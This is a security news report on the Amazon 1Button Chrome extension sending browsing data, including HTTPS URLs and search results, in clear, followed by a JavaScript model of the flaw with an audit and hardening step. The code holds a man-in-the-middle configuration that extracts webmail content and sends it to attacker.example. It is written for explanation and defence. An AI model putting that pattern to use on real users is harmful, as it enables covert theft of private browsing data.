Amazon 1Button, a Google Chrome browser add-on that provides users with access to the Amazon online marketplace, is leaking private information like a sieve, according to a security researcher.
The extension reports every URL you visit to Amazon, including the URLs of encrypted HTTPS sessions, injects script into every website you visit, and reports your Web activity to Alexa, Amazon's analytics service that tracks and ranks the traffic of top websites, said Krzysztof Kotowicz, a researcher specializing in Web security.
The Chrome extension is worrisome, Kotowicz said, because installing it requires the user to grant it permission to access data on all websites, read and modify bookmarks, detect physical location, access browsing activity, manage apps, extensions and themes, and read data that is copied and pasted. Nearly two million users have installed it, he said.
“There are a few interesting things going on (all of them require no user interaction and are based on default settings),” Kotowicz said.
The information Amazon 1Button sends to Alexa includes not only URLs but also Google searches — even those made over HTTPS — along with the first few results returned. The URL and page information, Kotowicz discovered, is sent unencrypted, over plain HTTP, to widgets[.]alexa[.]com.
“So man-in-the-middle attackers can access the information that the extension is configured to send to Alexa,” he said. “The real problem though is that attackers can actively exploit described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. [The] extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files.”
The files define which HTTPS sites the extension may inspect, which URL patterns to look for, and which XPath expressions to evaluate on matching pages to extract content for Alexa, Kotowicz said. The configuration files themselves were fetched in the clear, so anyone on the network path could replace them; last Friday Amazon changed this, and the files are now served over HTTPS, he said.
On his site, Kotowicz showed how a script can turn the extension into a transparent HTTPS-to-HTTP proxy. An attacker would need to route the victim's traffic through the proxy and run the script he wrote. There are limitations, he added, but he was still able to capture traffic, session IDs, e-mail messages, documents and more.
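To make the two problems described above concrete, here is an added example (not the extension's code, and not Kotowicz's script) that models the data flow: a remotely fetched configuration with URL patterns and extraction rules drives a content script, which beacons the extracted data to a configured endpoint. Host names, paths and rule field names are assumptions, the browsing session is constructed, and regular expressions stand in for the XPath expressions the article mentions so the code runs offline in Node without a DOM. It shows how a configuration fetched over plain HTTP lets a man-in-the-middle add rules for HTTPS sites and redirect the beacons, and it includes the audit a reviewer would run over the emitted beacons.

```javascript
// Added example (not the extension's or Kotowicz's code): a model of a
// remotely configured "report every visit" beacon like the one described
// in the article, plus the audit a reviewer would run over what it emits.
// Host names, paths and rule field names are assumptions for this demo.

// Constructed stand-in for the two config files the extension fetches.
// Plaintext HTTP here is the weakness: anyone on the path can rewrite it.
// Regexes stand in for the XPath expressions the article mentions.
const LEGIT_CONFIG = {
  configSource: 'http://config.vendor.example/rules.json',
  beaconEndpoint: 'http://beacon.vendor.example/collect',
  rules: [
    {
      urlPattern: '^https://www\\.google\\.com/search\\?',
      extract: { results: '<h3>(.*?)</h3>' }, // first search results
    },
  ],
};

// What a man-in-the-middle can substitute while the config travels over
// HTTP: an extra rule for a webmail site, with beacons redirected to the
// attacker. Only the data flow is modelled, not the real extension.
const MITM_CONFIG = {
  ...LEGIT_CONFIG,
  beaconEndpoint: 'http://attacker.example/collect',
  rules: [
    ...LEGIT_CONFIG.rules,
    {
      urlPattern: '^https://mail\\.example\\.com/',
      extract: { body: '<div class="msg">(.*?)</div>' },
    },
  ],
};

// Constructed browsing session: the URL and HTML a content script would see.
const VISITS = [
  { url: 'https://www.google.com/search?q=my+medical+condition',
    html: '<h3>Result one</h3><h3>Result two</h3>' },
  { url: 'https://mail.example.com/inbox/123',
    html: '<div class="msg">Contract draft attached</div>' },
  { url: 'https://bank.example.com/account', html: '<p>balance</p>' },
];

// Apply the config the way a content script would: for every visit whose
// URL matches a rule, pull the configured fields out of the page and queue
// a beacon to the configured endpoint. Returns the beacons; sends nothing.
function buildBeacons(config, visits) {
  const beacons = [];
  for (const visit of visits) {
    for (const rule of config.rules) {
      if (!new RegExp(rule.urlPattern).test(visit.url)) continue;
      const fields = {};
      for (const [name, pattern] of Object.entries(rule.extract)) {
        fields[name] = [...visit.html.matchAll(new RegExp(pattern, 'g'))]
          .map((m) => m[1]);
      }
      beacons.push({ to: config.beaconEndpoint, url: visit.url, fields });
    }
  }
  return beacons;
}

// Audit: flag a config that is itself fetched over plaintext (its rules can
// be swapped in transit) and every beacon that carries an HTTPS URL or page
// content to a plaintext endpoint (readable by a passive eavesdropper).
function audit(config, beacons) {
  const findings = [];
  if (config.configSource.startsWith('http://')) {
    findings.push('config fetched over HTTP: rules can be replaced in transit');
  }
  for (const b of beacons) {
    if (b.to.startsWith('http://') && b.url.startsWith('https://')) {
      findings.push(`HTTPS data (${b.url}; fields ${Object.keys(b.fields).join(',')}) sent in clear to ${b.to}`);
    }
  }
  return findings;
}

// Hardening: the change the article reports (config over HTTPS) plus the
// obvious next step it does not mention, sending the beacons over HTTPS too.
function hardenConfig(config) {
  const toHttps = (u) => u.replace(/^http:\/\//, 'https://');
  return {
    ...config,
    configSource: toHttps(config.configSource),
    beaconEndpoint: toHttps(config.beaconEndpoint),
  };
}

console.log(audit(LEGIT_CONFIG, buildBeacons(LEGIT_CONFIG, VISITS)));
console.log(audit(MITM_CONFIG, buildBeacons(MITM_CONFIG, VISITS)));
console.log(audit(hardenConfig(LEGIT_CONFIG), buildBeacons(hardenConfig(LEGIT_CONFIG), VISITS)));
```

Two points the run makes. With the legitimate config, the Google search results already leave over plaintext, which is the passive eavesdropping problem. With the substituted config, a rule for a site that was never on the vendor's list is applied and its page content goes to the attacker, which is the active problem; note that `audit` checks transport only, so once a hostile config has been accepted the audit cannot tell a legitimate endpoint from an attacker's, and fetching the configuration over HTTPS (what Amazon changed) is what prevents the substitution in the first place.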